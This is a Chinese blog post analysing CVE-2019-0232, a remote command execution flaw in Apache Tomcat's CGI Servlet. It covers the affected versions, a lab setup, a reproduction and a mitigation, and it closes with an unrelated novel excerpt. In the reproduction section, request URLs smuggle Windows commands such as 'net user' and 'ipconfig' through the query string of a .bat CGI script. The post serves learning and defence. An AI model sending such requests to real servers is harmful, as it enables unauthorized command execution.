cve-2019-0232Apache Tomcat远程代码执行漏洞分析

客官°小女子只卖身不卖艺 2023-05-28 11:12 17阅读 0赞

### 文章目录 ###

*   *  0x00 漏洞介绍
     *  0x01 影响版本
     *  0x02 漏洞环境
     *   *   *  第一步 更改web.xml下的cgi
             *  第二步 更改web.xml下的cgi的mappings注释去掉
             *  第三步 配置使有启动CGI\_Servlet的权限
             *  第四步 在webapps/ROOT/WEB-INF文件夹下建立hello.bat
             *  第五步 重启tomcat
     *  0x03 漏洞复现
     *  0x04 漏洞防护
     *  免责声明
     *  读书笔记

## 0x00 漏洞介绍 ##

2019年4月10日，Apache Tomcat披露了一个漏洞，漏洞编号为CVE-2019-0232，该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛，该漏洞一旦被大规模利用，带来后果将不堪设想，各大论坛也发布了相应的安全通告，提醒安全运维人员及时处理该漏洞。

## 0x01 影响版本 ##

<table> 
 <thead> 
  <tr> 
   <th></th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>Apache Tomcat 9.0.0.M1 to 9.0.17</td> 
  </tr> 
  <tr> 
   <td>Apache Tomcat 8.5.0 to 8.5.39</td> 
  </tr> 
  <tr> 
   <td>Apache Tomcat 7.0.0 to 7.0.93</td> 
  </tr> 
 </tbody> 
</table>

## 0x02 漏洞环境 ##

<table> 
 <thead> 
  <tr> 
   <th></th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>vmware15–window10</td> 
  </tr> 
  <tr> 
   <td>Apache tomcat 7.0.85</td> 
  </tr> 
 </tbody> 
</table>

<table> 
 <thead> 
  <tr> 
   <th></th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>\apache-tomcat-7.0.85\conf\web.xml</td> 
  </tr> 
  <tr> 
   <td>\apache-tomcat-7.0.85\conf\context.xml</td> 
  </tr> 
 </tbody> 
</table>

#### 第一步 更改web.xml下的cgi ####

注释的CGIServlet部分，去掉注释，并配置enableCmdLineArguments和executable，  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]

#### 第二步 更改web.xml下的cgi的mappings注释去掉 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

#### 第三步 配置使有启动CGI\_Servlet的权限 ####

(否则会出现404报错页面)  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]

#### 第四步 在webapps/ROOT/WEB-INF文件夹下建立hello.bat ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]

#### 第五步 重启tomcat ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

## 0x03 漏洞复现 ##

`[ http://192.168.146.142:8080/]`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]  
`[ http://192.168.146.142:8080/cgi-bin/hello.bat?dir]`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]  
`[ http://192.168.146.142:8080/cgi-bin/hello.bat?c:/windows/system32/net%20user]`

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]  
`[ http://192.168.146.142:8080/cgi-bin/hello.bat?c:/windows/system32/ipconfig]`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]

## 0x04 漏洞防护 ##

Apache官方还未正式发布以上最新版本，受影响的用户请保持关注，在官方更新后尽快升级进行防护。与此同时，用户可以将CGI Servlet初始化参数enableCmdLineArguments设置为false来进行防护。  
在Tomcat安装路径的conf文件夹下，使用编辑器打开web.xml，找到enableCmdLineArguments参数部分，添加如下配置：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]  
参考链接\[ https://xz.aliyun.com/t/4875\]

## 免责声明 ##

本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!  
由于使用不当造成的后果上传者概不负责！

## 读书笔记 ##

--------------------

夏夜的歌声，冬至的歌声  
都从水面掠过，皱起一层波纹  
像天空的坠落的泪水，又归于天空  
人们随口说的一些话，跌落墙角  
风吹不走，阳光烧不掉，独自沉眠  
生命是有光的  
在我熄灭以前，能够照亮你一点  
就是我所有能做的了  
我爱你，你要记得我  
有朵盛开的云  
缓缓滑过山顶，随风飘向天边  
我们慢慢明白，有些告别  
就是最后一面  
摘自《云边有个小卖部》

--------------------

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20230528/1ea0bc1e51d9440187ecf4c7c951aa1d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20230528/6961cf1b297246c887a72e704a970cdb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20230528/c53deb5d19b94334b80e33c7c950e779.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20230528/068604656d904dc985e17862d6690b16.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20230528/39eda2521c154f00baafa45c90821afb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20230528/29747c767e3f4550a7619417178a1e68.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20230528/b8bfe6f30e604e519e5b2b0a2bb6e34f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]: /images/20230528/87b02722952f44a092401ffab5732b43.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]: /images/20230528/9323a90d4efc45fe91d8e07a8436f990.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]: /images/20230528/09cfdef2c18c4be9ac437eac9a434e1a.png